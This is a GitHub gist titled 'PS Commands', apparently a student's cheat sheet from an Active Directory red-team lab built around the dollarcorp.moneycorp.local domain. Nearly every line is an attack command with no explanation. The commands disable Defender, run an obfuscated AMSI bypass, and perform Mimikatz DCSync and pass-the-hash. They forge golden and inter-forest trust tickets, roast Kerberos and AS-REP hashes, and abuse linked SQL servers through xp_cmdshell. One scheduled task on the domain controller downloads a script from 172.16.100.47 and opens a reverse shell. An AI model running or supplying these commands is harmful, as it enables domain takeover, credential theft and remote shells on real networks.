Last active
March 25, 2021 18:02
-
-
Save htkcodes/c4627a08cb7e1f02e191b36ece12533d to your computer and use it in GitHub Desktop.
PS Commands
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $session=New-PSSession –Computername Server1 | |
| Enter-PSSession $session | |
| Set-MpPreference -DisableRealtimeMonitoring $true | |
| Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections | |
| $ExecutionContext.SessionState.LanguageMode | |
| #Enum Applocker policy if you stumble upon constrained language mode | |
| Copy-Item .\Invoke-MimikatzEx.ps1 \\dcorpadminsrv.dollarcorp.moneycorp.local\c$\'Program Files' | |
| Copy-Item <Path> <Destination>\c$\'Program Files' | |
| #Ask for TGT from server using kekeo | |
| tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f | |
| #Ask for a TGS | |
| tgs::s4u /tgt:[email protected]_krbtgt~dollarcorp.moneycorp.local@DOLLAR | |
| CORP.MONEYCORP.LOCAL.kirbi /user:[email protected] | |
| /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL | |
| #PASS THE TICKET USING MIMKATZ | |
| Invoke-Mimikatz -Command '"kerberos::ptt | |
| [email protected]@DOLLARCORP.MONEYCORP.LOCAL_ldap~ | |
| [email protected]_ALT.kirbi"' | |
| #dump lsass | |
| Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"' | |
| gwmi -Class win32_computersystem -ComputerName dcorpdc.dollarcorp.moneycorp.local | |
| # find out services running with user accounts as the services running with machine accounts have difficult passwords | |
| Get-NetUser -SPN | |
| # Request ticket for the service | |
| Add-Type -AssemblyNAme System.IdentityModel | |
| New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.loca | |
| Get-DomainUser -PreauthNotRequired -Verbose | |
| Set-DomainObject -Identity ControlXUser -XOR @ {useraccountcontrol=4194304} -Verbose | |
| Get-DomainUser -PreauthNotRequired -Verbose -Identity Control47User | |
| Get-ASREPHash -UserName VPN1user -Verbose | |
| \\dcorp-dc.dollarcorp.moneycorp.local | |
| Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorpdc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"' | |
| \\dcorp-appsrv.dollarcorp.moneycorp.local | |
| schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "black47" | |
| schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "black47" /TR "powershell.exe -c 'iex(New-Object Net.WebClient).DownloadString(''http://172.16.100.47/Invoke-PowerShellTcp.ps1''')'';Power -Reverse -IPAddress 172.16.100.47 -Port 4444" | |
| sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) | |
| Set-MpPreference -DisableRealtimeMonitoring $true | |
| Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"' | |
| Trust token - 776b4d2c86b0dd0c79cab6511728264f | |
| domain sid - S-1-5-21-1874506631-3219952063-538504511 | |
| EA - SIDS - S-1-5-21-280534878-1496970234-700767426-519 | |
| EU EA SIDS - S-1-5-21-1652071801-1423090587-98612180-519 | |
| Get-NetGroup -Domain moneycorp.local -GroupName "Enterprise Admins" -FullData | |
| Invoke-Mimikatz -Command '"lsadump::trust /patch"' | |
| Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:776b4d2c86b0dd0c79cab6511728264f /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"' | |
| \Rubeus.exe asktgs /ticket:C:trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorpdc.moneycorp.local /ptt | |
| Invoke-Mimikatz -Command '"lsadump::trust /patch"' | |
| Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid: S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:433e7fd056a2b3512efb341590d7c436 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"' | |
| Set-RemoteWMI -SamAccountName student47 -ComputerName dcorpdc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -Verbose | |
| \asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local | |
| .\kirbikator.exe lsa .\CIFS.mcorp-dc.moneycorp.local.kirbi | |
| ls \\mcorp-dc.moneycorp.local\c$ | |
| Get-SQLServerLink -Instance dcorp-mssql -Verbose | |
| Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose | |
| Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" | |
| select * from openquery("dcorp-sql1",'select * from openquery("dcorpm-gmt",''select * from openquery("eu-sql.eu.eurocorp.local",''''select @@version as version;exec master..xp_cmdshell "powershell whoami)'''')'')') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment